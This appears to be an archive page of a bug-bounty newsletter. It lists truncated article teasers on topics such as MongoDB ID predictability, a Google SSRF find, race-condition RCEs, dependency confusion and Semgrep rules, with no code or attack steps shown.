MongoDB ID, source below MongoDB is a document-oriented database, known also as NoSQL. By default, objects are identified using 12 bytes IDs. It's too much to think about brute-force but those identifiers are not random. They are built like this: 4-byte value...
Articles by Issue
Bug Hunter recorded himself finding $10k SSRF in Google
David Schütz, the first guest of my BBRD podcast and the author of 2 vulnerabilities covered on my channel, had an idea to record himself while bug hunting on Google. He did that and he captured the whole process of finding and escalating an SSRF found in Google. We...
The best no bulls**t advice for getting into cybersec
BasteG0d69 created a video "The MOST IMPORTANT advice for young hackers". At first, I thought it may be one of many such videos. However, I've watched it and this one is the best one I've seen. He's really concise, straightforward and gets the...
How to identify impact of leaked private key?
Truffle Security, the company behind the secret scanning tool called truffleHog, created another tool - Driftwood. You can use it to identify the impact of a leaked private key. It's useful because the impact of this is not easy to check as, for example, of a...
Race condition RCEs
When I say race condition, the first thing that comes to your mind might be redeeming a discount code twice thus gaining some money. So what on Earth is the race condition RCE? It will work best in apps where you can upload an executable file, for example, PHP or ASP....
Session tokens resources
I have a few good resources about different kinds of session cookies/tokens/api keys or whatever you want to call it. There are many types of bugs you can find there and very often they have a big impact. Let's start with what types of tokens are even there....
Which CVEs are the hottest?
CVE trends is a fun project that ranks recent CVEs based on how many people talk about them on Twitter. Well, I know that Twitter audience isn't the most important factor of any vulnerability but it is an indication of how many people are affected by the bug...
Dependency Confusion POC
Aditya Shende , Bugcrowd top 100, had a talk about dependency confusion lately on DAMNCON. I don't see many practical articles about this vulnerability class and many of you are asking for it. On slides, you can see exactly what steps did he take to reproduce the...
WordPress Confusion
WordPress websites use many external plugins and themes. Importantly, they might be stored in the public WP plugins repository as well as in the private ones. It does remind me a bit the setup for dependency confusion vulnerability. That's pretty much what...
Writing custom semgrep rules
Semgrep is a tool for static source code analysis. It does use regexes but it also understands the code enough to catch some cases of the same thing written in 2 ways. There is a registry of public rules which you can use (https://semgrep.dev/r ) but it's not...